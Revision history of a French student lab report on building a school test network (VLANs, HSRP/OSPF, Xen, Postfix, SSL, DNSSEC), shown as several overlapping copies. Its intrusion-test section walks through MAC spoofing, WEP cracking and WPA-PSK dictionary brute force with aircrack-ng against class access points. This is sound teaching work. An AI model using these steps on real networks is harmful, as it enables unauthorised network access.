/> while(i<100000000)<br /> {<br /> printf("%08d\n",i);<br /> i++;<br /> }<br /> return 0;<br /> }<br /> </pre><br /> <br /> Il faut ensuite récupérer le handshake :<br /> <br /> <pre><br /> airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake<br /> </pre> <br /> <br /> J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.<br /> <br /> <pre><br /> df<br /> fdisk -l<br /> mkfs /dev/sda1<br /> mount /dev/sda1 /mnt<br /> cp handshake-01.cap /mnt<br /> umount /mnt<br /> </pre><br /> <br /> Une fois que le fichier est sur pifou, je lance le traitement :<br /> <br /> <pre><br /> aircrack-ng -w dico.txt handshake-01.cap<br /> </pre><br /> <br /> Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !<br /> <br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : Connexion sur Weppes puis ssh root@193.57.48.183<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> Je commence par installer sur la machine virtuellepostfix et bsd-mailx :<br /> <pre><br /> apt-get install postfix<br /> vim /etc/aliases ==> rajout d'une ligne admin: root<br /> newaliases<br /> apt-get install mailx<br /> </pre><br /> <br /> Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. <br /> <br /> En utilisant "p" je peux l'afficher.<br /> <br /> <br /> <br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> <h3> Sécurisation de site web par certificat</h3><br /> <br /> Maintenant je vais réclamer mon certificat : <br /> <pre><br /> Je vais sur le site de gandi<br /> Je clique sur Certificat SSL qui est actuellement inactif<br /> Je vais dans la FAQ et je cherche comment générer une CSR ? <br /> Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM<br /> Country Name (2 letter code) [AU]: FR<br /> State or Province Name (full name) [Some-State]: Nord<br /> Locality Name (eg, city) []: Lille<br /> Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille<br /> Organizational Unit Namec SSLCertificateChainFile. (eg, section) []: <br /> Common Name (eg, YOUR name) []: hunt3r.lol<br /> Email Address []: admin@hunt3r.lol<br /> A challenge password []: <br /> An optional company name []:<br /> Il me génère donc deux fichiers, le .csr et le .key<br /> J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.<br /> <br /> Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)<br /> Je valide ma demande grâce au code reçu dans ma boite mail hunt3r et j'attends le certificat.<br /> Une fois reçu je crée un fichier Werewolf.cer et je colle le certificat que j'ai récupéré.<br /> Même chose pour les certificats intermédiaire.<br /> </pre><br /> <br /> Je peux commencer alors la configuration d'apache2 avec mon certificat :<br /> <br /> <pre><br /> cd /etc/apache2/sites-available<br /> vim default-ssl.conf<br /> SSLCertificateFile /root/Werewolf.cer<br /> SSLCertificateKeyFile /root/Werewolf.key<br /> #SSLCertificateChainFile /root/WerewolfInter.cer<br /> <br /> 3 commandes me permettent de mettre en route le tout :<br /> a2ensite default-ssl<br /> a2enmod ssl<br /> service apache2 restart<br /> </pre><br /> <br /> Une fois cela fait, lorsque je vais sur ma page internet je remarque je peux y aller à la fois normalement c'est à dire en écrivant : http://www.hunt3r.lol/ mais aussi en utilisant la connexion sécurisée : https://www.hunt3r.lol/. On remarque qu'avec l'https on a bien un cadenas.<br /> <br /> <br /> <h3>Sécurisation de serveur DNS par DNSSEC</h3><br /> <br /> <pre><br /> cd /etc/bind<br /> vim named.conf.options ==> rajout de l'option dnssec-enable yes;<br /> mkdir hunt3r.dnssec<br /> cd hunt3r.dnssec<br /> dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE -r /dev/urandom hunt3r.dnssec<br /> dnssec-keygen -a RSASHA1 -b 1024 -n ZONE -r /dev/urandom hunt3r.dnssec<br /> Je renomme les fichiers créé en : <br /> *hunt3r-ksk.key<br /> *hunt3r-ksk.private<br /> *hunt3r-zsk.key<br /> *hunt3r-zsk.private<br /> <br /> <br /> <br /> </pre><br /> <br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> <br /> Arrivée au partitionnement :<br /> <br /> J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. <br /> Nom du miroir de l'archive Debian : debian.polytech-lille.fr<br /> Mandataire HTTP : http://proxy.polytech-lille.fr:3128<br /> Logiciels à installer : Xfce, service SSH et utilitaies usuels du système (à valider à l'aider de la barre espace)<br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=23154 TP sysres IMA2a5 2015/2016 G6 2015-11-23T16:03:50Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>1</th><th>default</th><th>172.20.99.0/24</th><th>172.20.99.252</th><th>172.20.99.254</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.<br /> <br /> Pour cela j'installe aircrack.<br /> <br /> <pre><br /> Code : <br /> apt-get install aircrack-ng<br /> </pre><br /> <br /> <pre><br /> Modification du fichier /etc/apt/sources.list : <br /> rajout de contrib non-free<br /> <br /> Modification du fichier /etc/network/interfaces : <br /> auto eth0<br /> iface eth0 inet static <br /> address 172.20.106.6<br /> netmask 255.255.255.0<br /> gateway 172.20.106.254<br /> <br /> Modification du fichier /etc/resolv.conf : <br /> nameserver 193.48.57.34<br /> </pre><br /> <br /> <pre><br /> Code : <br /> apt-get install firmware-linux-nonfree<br /> apt-get remove network-manager<br /> apt-get install broadcom-sta-dkms<br /> modprobe wl<br /> modprobe -r b44 b43 b43legacy ssb brcmsmac<br /> modprobe -r wl<br /> modprobe wl*dmseg<br /> dmseg<br /> ifconfig -a <br /> reboot<br /> </pre><br /> <br /> A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]<br /> <br /> <br /> <pre><br /> code :<br /> airmon -ng start wlan1 ==> cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin<br /> soltion : apt-get install firmware-ralink<br /> <br /> <br /> Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0<br /> <br /> Je ré-ouvre une mon0.<br /> <br /> J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.<br /> <br /> Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.<br /> <br /> Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)<br /> <br /> code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.<br /> <br /> Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier<br /> <br /> <br /> Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! <br /> <br /> <br /> </pre><br /> <br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> On va commencer par créer un dictionnaire de clé : <br /> <br /> <pre><br /> #include <stdio.h><br /> <br /> int main (void)<br /> {<br /> int i=0;<br /> while(i<100000000)<br /> {<br /> printf("%08d\n",i);<br /> i++;<br /> }<br /> return 0;<br /> }<br /> </pre><br /> <br /> Il faut ensuite récupérer le handshake :<br /> <br /> <pre><br /> airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake<br /> </pre> <br /> <br /> J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.<br /> <br /> <pre><br /> df<br /> fdisk -l<br /> mkfs /dev/sda1<br /> mount /dev/sda1 /mnt<br /> cp handshake-01.cap /mnt<br /> umount /mnt<br /> </pre><br /> <br /> Une fois que le fichier est sur pifou, je lance le traitement :<br /> <br /> <pre><br /> aircrack-ng -w dico.txt handshake-01.cap<br /> </pre><br /> <br /> Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !<br /> <br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : Connexion sur Weppes puis ssh root@193.57.48.183<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> Je commence par installer sur la machine virtuellepostfix et bsd-mailx :<br /> <pre><br /> apt-get install postfix<br /> vim /etc/aliases ==> rajout d'une ligne admin: root<br /> newaliases<br /> apt-get install mailx<br /> </pre><br /> <br /> Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. <br /> <br /> En utilisant "p" je peux l'afficher.<br /> <br /> <br /> <br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> <h3> Sécurisation de site web par certificat</h3><br /> <br /> Maintenant je vais réclamer mon certificat : <br /> <pre><br /> Je vais sur le site de gandi<br /> Je clique sur Certificat SSL qui est actuellement inactif<br /> Je vais dans la FAQ et je cherche comment générer une CSR ? <br /> Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM<br /> Country Name (2 letter code) [AU]: FR<br /> State or Province Name (full name) [Some-State]: Nord<br /> Locality Name (eg, city) []: Lille<br /> Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille<br /> Organizational Unit Namec SSLCertificateChainFile. (eg, section) []: <br /> Common Name (eg, YOUR name) []: hunt3r.lol<br /> Email Address []: admin@hunt3r.lol<br /> A challenge password []: <br /> An optional company name []:<br /> Il me génère donc deux fichiers, le .csr et le .key<br /> J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.<br /> <br /> Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)<br /> Je valide ma demande grâce au code reçu dans ma boite mail hunt3r et j'attends le certificat.<br /> Une fois reçu je crée un fichier Werewolf.cer et je colle le certificat que j'ai récupéré.<br /> Même chose pour les certificats intermédiaire.<br /> </pre><br /> <br /> Je peux commencer alors la configuration d'apache2 avec mon certificat :<br /> <br /> <pre><br /> cd /etc/apache2/sites-available<br /> vim default-ssl.conf<br /> SSLCertificateFile /root/Werewolf.cer<br /> SSLCertificateKeyFile /root/Werewolf.key<br /> #SSLCertificateChainFile /root/WerewolfInter.cer<br /> <br /> 3 commandes me permettent de mettre en route le tout :<br /> a2ensite default-ssl<br /> a2enmod ssl<br /> service apache2 restart<br /> </pre><br /> <br /> Une fois cela fait, lorsque je vais sur ma page internet je remarque je peux y aller à la fois normalement c'est à dire en écrivant : http://www.hunt3r.lol/ mais aussi en utilisant la connexion sécurisée : https://www.hunt3r.lol/. On remarque qu'avec l'https on a bien un cadenas.<br /> <br /> <br /> <h3>Sécurisation de serveur DNS par DNSSEC</h3><br /> <br /> <br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> <br /> Arrivée au partitionnement :<br /> <br /> J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. <br /> Nom du miroir de l'archive Debian : debian.polytech-lille.fr<br /> Mandataire HTTP : http://proxy.polytech-lille.fr:3128<br /> Logiciels à installer : Xfce, service SSH et utilitaies usuels du système (à valider à l'aider de la barre espace)<br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=23153 TP sysres IMA2a5 2015/2016 G6 2015-11-23T15:40:25Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>1</th><th>default</th><th>172.20.99.0/24</th><th>172.20.99.252</th><th>172.20.99.254</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.<br /> <br /> Pour cela j'installe aircrack.<br /> <br /> <pre><br /> Code : <br /> apt-get install aircrack-ng<br /> </pre><br /> <br /> <pre><br /> Modification du fichier /etc/apt/sources.list : <br /> rajout de contrib non-free<br /> <br /> Modification du fichier /etc/network/interfaces : <br /> auto eth0<br /> iface eth0 inet static <br /> address 172.20.106.6<br /> netmask 255.255.255.0<br /> gateway 172.20.106.254<br /> <br /> Modification du fichier /etc/resolv.conf : <br /> nameserver 193.48.57.34<br /> </pre><br /> <br /> <pre><br /> Code : <br /> apt-get install firmware-linux-nonfree<br /> apt-get remove network-manager<br /> apt-get install broadcom-sta-dkms<br /> modprobe wl<br /> modprobe -r b44 b43 b43legacy ssb brcmsmac<br /> modprobe -r wl<br /> modprobe wl*dmseg<br /> dmseg<br /> ifconfig -a <br /> reboot<br /> </pre><br /> <br /> A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]<br /> <br /> <br /> <pre><br /> code :<br /> airmon -ng start wlan1 ==> cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin<br /> soltion : apt-get install firmware-ralink<br /> <br /> <br /> Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0<br /> <br /> Je ré-ouvre une mon0.<br /> <br /> J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.<br /> <br /> Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.<br /> <br /> Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)<br /> <br /> code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.<br /> <br /> Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier<br /> <br /> <br /> Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! <br /> <br /> <br /> </pre><br /> <br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> On va commencer par créer un dictionnaire de clé : <br /> <br /> <pre><br /> #include <stdio.h><br /> <br /> int main (void)<br /> {<br /> int i=0;<br /> while(i<100000000)<br /> {<br /> printf("%08d\n",i);<br /> i++;<br /> }<br /> return 0;<br /> }<br /> </pre><br /> 